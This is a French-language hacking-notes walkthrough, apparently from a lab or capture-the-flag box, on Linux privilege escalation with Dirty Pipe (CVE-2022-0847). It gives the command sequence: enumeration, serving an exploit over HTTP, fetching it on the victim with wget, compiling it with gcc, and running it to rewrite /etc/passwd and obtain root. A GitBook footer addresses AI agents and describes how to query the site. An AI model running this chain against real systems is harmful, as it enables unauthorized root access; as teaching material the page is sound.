> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/dirty-pipe-linux-privilege-escalation.md).

# Dirty Pipe

## Ce que c’est

Cette page documente une technique d’élévation de privilèges sous Linux avec des étapes de validation pratiques et des exemples d’exploitation. Cette page précise se concentre sur **Dirty Pipe** et maintient le flux d’exploitation pratique : identifiez la condition, validez-la en toute sécurité, puis exécutez la charge utile minimale nécessaire pour prouver l’impact.

## Énumération

Commencez par confirmer le contexte local et la mauvaise configuration exacte avant d’exécuter la voie d’exploitation.

```bash
id
uname -a
```

## Exemples

{% hint style="info" %}
**Dirty Pipe** (CVE-2022-0847) est une faille du noyau Linux qui permet à un utilisateur local non privilégié de modifier des fichiers système à l’exécution, y compris des fichiers protégés tels que **/etc/passwd**. Cette vulnérabilité exploite une faille dans la gestion des pipes du noyau, permettant à un processus de modifier un fichier pendant qu’il est utilisé par un autre processus, y compris des fichiers en lecture seule ou des fichiers écrits par des utilisateurs privilégiés.
{% endhint %}

## Exploitation de Dirty Pipe

{% embed url="<https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit>" %}

Vérifiez si la machine est vulnérable à Dirty Pipe, une faille qui peut modifier des fichiers système à l’exécution. Nous avons trouvé **gcc**, un compilateur C, disponible à `/usr/bin/gcc`.

```bash
which gcc
/usr/bin/gcc
```

Utilisez **Python3** pour transférer l’exploit de la machine locale vers la cible. Démarrez un serveur HTTP localement pour l’héberger :

```bash
python3 -m http.server
```

Sur la machine victime, nous avons téléchargé l’exploit :

```bash
wget http://10.10.14.4/exploit.c
```

<figure><img src="/files/c7d0b54d5f08c2df11675b3f734d816a174580f2" alt=""><figcaption></figcaption></figure>

Une fois l’exploit récupéré, nous avons compilé le fichier C avec **gcc**:

```bash
gcc exploit.c -o exploit
```

{% hint style="info" %}
L’exploit modifie le `/etc/passwd` fichier en injectant un hachage de mot de passe, et ajoute un `aaron` utilisateur avec un mot de passe spécifique, le tout pour permettre l’élévation de privilèges.
{% endhint %}

<figure><img src="/files/c4d086c7ef466824edba20513b8ca7f12b55838d" alt=""><figcaption></figcaption></figure>

Enfin, il suffit d’exécuter le script :

```bash
./exploit
```

Cela donne **`root`** un accès sur la machine.

<figure><img src="/files/6ad1dac72fb88ca70bb8d19ea49c2d8a6127906e" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/dirty-pipe-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
